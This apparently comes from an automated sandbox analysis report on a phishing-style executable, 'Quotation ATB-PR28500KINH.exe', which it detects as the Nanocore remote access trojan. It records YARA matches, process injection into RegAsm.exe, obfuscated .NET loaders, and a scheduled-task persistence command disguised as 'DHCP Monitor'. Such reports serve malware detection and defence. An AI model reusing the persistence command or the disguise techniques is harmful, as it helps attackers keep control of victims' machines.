Source: 00000004.00000002.513526465.0000000005940000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.513526465.0000000005940000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.506085283.0000000001233000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.506085283.0000000001233000.00000004.00000020.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000012.00000002.315053355.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000012.00000002.315053355.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegAsm.exe PID: 6916, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: RegAsm.exe PID: 6916, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 6620, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 6620, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegAsm.exe PID: 7048, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: RegAsm.exe PID: 7048, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 6988, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 6988, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.Quotation ATB-PR28500KINH.exe.59e0000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.Quotation ATB-PR28500KINH.exe.59e0000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Quotation ATB-PR28500KINH.exe.59e0000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 18.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.Quotation ATB-PR28500KINH.exe.5a80000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.Quotation ATB-PR28500KINH.exe.5a80000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.Quotation ATB-PR28500KINH.exe.5a80000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.RegAsm.exe.68a0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.RegAsm.exe.68a0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.RegAsm.exe.5940000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.RegAsm.exe.5940000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.RegAsm.exe.68a0000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.RegAsm.exe.68a0000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: Quotation ATB-PR28500KINH.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 5thncv.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: HJdyTuap.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 0.2.Quotation ATB-PR28500KINH.exe.59e0000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.Quotation ATB-PR28500KINH.exe.59e0000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Quotation ATB-PR28500KINH.exe.59e0000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 4.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.Quotation ATB-PR28500KINH.exe.5a80000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.2.Quotation ATB-PR28500KINH.exe.5a80000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.Quotation ATB-PR28500KINH.exe.5a80000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 18.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 18.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.2.Quotation ATB-PR28500KINH.exe.5a80000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 5.2.Quotation ATB-PR28500KINH.exe.5a80000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 4.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Quotation ATB-PR28500KINH.exe.59e0000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 0.2.Quotation ATB-PR28500KINH.exe.59e0000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: classification engine

Classification label: mal100.troj.adwa.evad.winEXE@14/8@21/1

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe

File created: C:\Users\user\AppData\Roaming\5thncv

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7036:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{a69adb5e-9e05-4144-8e58-f506b6f9f16f}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7132:120:WilError_01
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Mutant created: \Sessions\1\BaseNamedObjects\Startup_shellcode_006

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Temp\tmp21A1.tmp

Jump to behavior

Source: Quotation ATB-PR28500KINH.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Quotation ATB-PR28500KINH.exe

ReversingLabs: Detection: 27%

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe

File read: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe 'C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: unknown	Process created: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe 'C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp21A1.tmp'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 0
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process created: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe 'C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp21A1.tmp'	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Jump to behavior

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Quotation ATB-PR28500KINH.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Quotation ATB-PR28500KINH.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: RegAsm.pdb source: RegAsm.exe, 00000004.00000003.338308664.000000000167C000.00000004.00000001.sdmp
Source:	Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000004.00000003.338308664.000000000167C000.00000004.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: 0.2.Quotation ATB-PR28500KINH.exe.59e0000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.Quotation ATB-PR28500KINH.exe.59e0000.1.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.RegAsm.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.Quotation ATB-PR28500KINH.exe.5a80000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.Quotation ATB-PR28500KINH.exe.5a80000.1.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 18.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 18.2.RegAsm.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: HJdyTuap.exe.0.dr

Static PE information: real checksum: 0x104824 should be: 0x105424

Source: initial sample	Static PE information: section name: .text entropy: 7.86217054502
Source: initial sample	Static PE information: section name: .text entropy: 7.86217054502
Source: initial sample	Static PE information: section name: .text entropy: 7.86217054502

Source: 0.2.Quotation ATB-PR28500KINH.exe.59e0000.1.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 0.2.Quotation ATB-PR28500KINH.exe.59e0000.1.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 4.2.RegAsm.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 4.2.RegAsm.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
